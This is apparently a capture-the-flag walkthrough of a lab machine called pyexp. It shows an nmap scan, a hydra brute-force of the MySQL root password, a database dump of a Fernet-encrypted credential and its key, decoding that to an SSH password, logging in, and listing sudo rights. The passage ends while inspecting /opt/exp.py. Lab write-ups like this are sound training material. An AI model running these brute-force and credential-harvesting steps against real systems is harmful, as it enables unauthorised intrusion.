PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
| 256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_ 256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
| Thread ID: 41
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolOld, ODBCClient, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: u$N<"6&[zuY@rA,UHL"a
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As we can see port 3306 is MySQL while we have no idea what to do so let’s brute force it
┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.125.118 -t 64
Ending up getting the password prettywoman
When we got the password let’s remote login to the database
┌──(kali㉿VirtualBox)-[~]
└─$ mysql -u root -h 192.168.125.118 -p
Enter password: prettywoman
Welcome to the MariaDB monitor. Commands end with ; or \\g.
Your MariaDB connection id is 901
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| data |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
MariaDB [(none)]> use data;
**Database changed**
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet |
+----------------+
MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred | keyy |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
What we do get here is having fernet database, with cred and keyy
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=
We go to https://asecuritysite.com/encryption/ferdecode to do the decode and we will get:
lucy:wJ9`"Lemdv9[FEw-
Let’s ssh into it specifying port 1337
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected] -p 1337
[email protected]'s password: wJ9`"Lemdv9[FEw-
lucy@pyexp:~$ cat local.txt
d256137a530979e5ccdbf2777c8292b5
lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User lucy may run the following commands on pyexp:
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py
We can run /usr/bin/python2 /opt/exp.py as root, however, /opt/exp.py is root’s thingy
lucy@pyexp:~$ cd /opt/
lucy@pyexp:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 10 2020 .
drwxr-xr-x 18 root root 4096 Oct 19 2020 ..
-rw-r--r-- 1 root root 49 Aug 10 2020 exp.py
Let’s see what is inside /opt/exp.py